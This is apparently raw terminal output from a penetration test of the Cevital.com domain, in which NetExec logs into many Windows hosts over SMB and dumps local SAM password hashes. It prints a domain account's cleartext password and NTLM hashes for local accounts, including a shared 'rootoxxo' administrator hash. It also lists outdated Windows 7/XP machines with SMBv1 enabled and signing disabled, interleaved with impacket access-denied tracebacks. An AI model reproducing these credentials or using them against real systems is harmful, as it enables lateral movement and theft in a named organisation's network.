│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.164 445 OXOASP02022 [*] Dumping SAM hashes


SMB 10.34.160.120 445 OXODT020116 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.116 445 OXODT020068 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:b5291c23de6cb8c96c21c55be36f543
a:::
SMB 10.34.162.164 445 OXOASP02022
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.74 445 OXODT020158 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.222 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
[03:24:28] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.164 445 OXOASP02022


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:22cd04317fba5bde4063c97be8f
44fd7:::
SMB 10.34.162.164 445 OXOASP02022 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.24 445 OXODT020088 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116 [*] Dumping SAM hashes
SMB 10.34.160.135 445 OXOLT020057 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.59 445 OXODT020127 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:29] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.4 445 4005073-001 [*] Windows 7 Ultimate 7601


Service Pack 1 x32 (name:4005073-001) (domain:4005073-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.1 445 4004794-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004794-001) (domain:4004794-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.7 445 4005074-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4005074-001) (domain:4005074-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.5 445 4004832-002 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004832-002) (domain:4004832-002) (signing:False)
(SMBv1:True)
SMB 10.34.162.2 445 4004353-007 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004353-007) (domain:4004353-007) (signing:False)
(SMBv1:True)
SMB 10.34.160.120 445 OXODT020116
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.6 445 4004832-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004832-001) (domain:4004832-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.3 445 4004353-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004353-001) (domain:4004353-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.8 445 4004795-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004795-001) (domain:4004795-001) (signing:False)
(SMBv1:True)
SMB 10.34.160.24 445 OXODT020088 [*] Dumping SAM hashes
SMB 10.34.160.106 445 OXODT02070004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.135 445 OXOLT020057 [*] Dumping SAM hashes
SMB 10.34.160.25 445 OXODT02090005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.120 445 OXODT020116 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.207 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.160.24 445 OXODT020088
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.59 445 OXODT020127 [*] Dumping SAM hashes
SMB 10.34.160.24 445 OXODT020088
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.135 445 OXOLT020057
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.39 445 OXODT020079 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.135 445 OXOLT020057
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.24 445 OXODT020088
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.106 445 OXODT02070004 [*] Dumping SAM hashes
SMB 10.34.160.59 445 OXODT020127
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.135 445 OXOLT020057
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.24 445 OXODT020088
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.24 445 OXODT020088 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.110 445 OXODT020011 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.59 445 OXODT020127
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.135 445 OXOLT020057
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.135 445 OXOLT020057 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.106 445 OXODT02070004
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.59 445 OXODT020127
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.45 445 OXODT020047 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.39 445 OXODT020079 [*] Dumping SAM hashes
SMB 10.34.160.106 445 OXODT02070004
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[03:24:33] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.59 445 OXODT020127


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.59 445 OXODT020127 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.106 445 OXODT02070004
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.110 445 OXODT020011 [*] Dumping SAM hashes
SMB 10.34.160.136 445 OXODT020004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.106 445 OXODT02070004
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.106 445 OXODT02070004 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.39 445 OXODT020079
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.39 445 OXODT020079
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.110 445 OXODT020011
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.110 445 OXODT020011
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.39 445 OXODT020079
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.163.253 445 OXBBALSCSRV01 [*] Unix (name:OXBBALSCSRV01)
(domain:cevital.com) (signing:False) (SMBv1:True)
SMB 10.34.160.110 445 OXODT020011
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.39 445 OXODT020079
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.39 445 OXODT020079 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.110 445 OXODT020011
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.110 445 OXODT020011 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.23 445 CEVLAP2116 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@
[03:24:36] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.146 445 OXOLT020059 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.136 445 OXODT020004 [*] Dumping SAM hashes
SMB 10.34.160.80 445 OXODT020030 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.136 445 OXODT020004
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.136 445 OXODT020004
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.136 445 OXODT020004
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.136 445 OXODT020004
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.136 445 OXODT020004 [+] Added 4 SAM hashes to the
database
SMB 10.34.163.1 445 L2-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L2-MLR) (domain:L2-MLR) (signing:False) (SMBv1:True)
SMB 10.34.163.6 445 L2-SV800-232 [*] Windows 5.1 x32 (name:L2-
SV800-232) (domain:L2-SV800-232) (signing:False) (SMBv1:True)
SMB 10.34.163.28 445 L2-SSK-003 [*] Windows 5.1 x32 (name:L2-
SSK-003) (domain:L2-SSK-003) (signing:False) (SMBv1:True)
SMB 10.34.163.26 445 L1-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L1-SERVER-PC) (domain:L1-Server-Pc) (signing:False)
(SMBv1:True)
SMB 10.34.160.113 445 OXODT020031 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.127 445 OXODT020142 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.34 445 L3-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-MLR) (domain:L3-MLR) (signing:False) (SMBv1:True)
SMB 10.34.163.48 445 L3-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-SERVER-PC) (domain:L3-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.163.45 445 L3-VPA1084-2 [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-VPA1084-2) (domain:L3-VPA1084-2) (signing:False)
(SMBv1:True)
SMB 10.34.163.55 445 L4-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L4-SERVER-PC) (domain:L4-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.161.1 445 OXODT02030007 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.80 445 L1-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L1-MLR) (domain:L1-MLR) (signing:False) (SMBv1:True)
[03:24:38] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
